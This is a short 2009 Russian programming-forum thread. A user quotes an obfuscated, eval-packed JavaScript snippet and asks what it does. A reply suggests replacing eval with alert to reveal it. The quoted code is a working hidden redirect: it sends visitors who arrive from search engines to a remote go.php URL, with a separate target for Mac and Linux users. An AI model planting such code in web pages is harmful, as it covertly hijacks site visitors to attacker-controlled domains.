Форум программистов
 

Восстановите пароль или Зарегистрируйтесь на форуме, о проблемах и с заказом рекламы пишите сюда - alarforum@yandex.ru, проверяйте папку спам!

Вернуться   Форум программистов > Web программирование > JavaScript, Ajax
Регистрация

Восстановить пароль
Повторная активизация e-mail

Купить рекламу на форуме - 42 тыс руб за месяц

Ответ
 
Опции темы Поиск в этой теме
Старый 22.08.2009, 05:00   #1
GandaIf
Новичок
Джуниор
 
Регистрация: 22.08.2009
Сообщений: 1
Вопрос Подскажите, что делает данный скрипт на JS?

Цитата:
var url="delayyouranswer.cn";
var macurl="http://www.zml.com/?did=0";
eval(function(p,a,c,k,e,r){e=functi on(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCod e(c+29):c.toString(36))};if(!''.rep lace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};wh ile(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('a 2,i,d=0;a e=u v("w","s","x.z","A"," B");4(3.9)2=3.9;7 2="";C(i=0;i<5;i++){4(2.6("t%")!=-1){}7{4(2.6(e[i])>=0){d=1;4((8.b.6("y")!=-1)||(8.b.6("r")!=-1)){3.c=h}7 3.c="l://"+k+"/q.g?o=n-m&j=f&p=1"}}}',39,39,'||ref|documen t|if||indexOf|else|navigator|referr er|var|appVersion|location|is_se|se |b8c7c33ca|php|macurl||key|url|http |10|2010|id||go|Linux|msn|site|new| Array|google|aol|Mac|com|yahoo|comc ast|for'.split('|'),0,{}))
Кто разбирается - что за вредоносная штука и что она делает?
Регистрация доменов в 250 зонах. Самые низкие цены.
Скидки по распродаже "6 лет компании" - http://sellout.name/

Последний раз редактировалось GandaIf; 22.08.2009 в 05:04.
GandaIf вне форума Ответить с цитированием
Старый 22.08.2009, 09:19   #2
wall66
Участник клуба
 
Аватар для wall66
 
Регистрация: 04.10.2008
Сообщений: 1,485
По умолчанию

поставь заместо eval-а alert - все сам узнаешь
свободен...
wall66 вне форума Ответить с цитированием
Ответ


Купить рекламу на форуме - 42 тыс руб за месяц



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Что делает этот код? lucky Общие вопросы Delphi 4 17.06.2009 17:02
функция high что делает? Ivan3000 Помощь студентам 2 04.06.2009 14:05
что делает функция length() ??? Paul_AG Общие вопросы C/C++ 4 11.05.2009 00:07
Excel 2007/ А что он делает в данный момент? kzld Microsoft Office Excel 10 30.03.2009 11:14
Что делает этот while do? Levhik Общие вопросы C/C++ 4 25.01.2009 17:27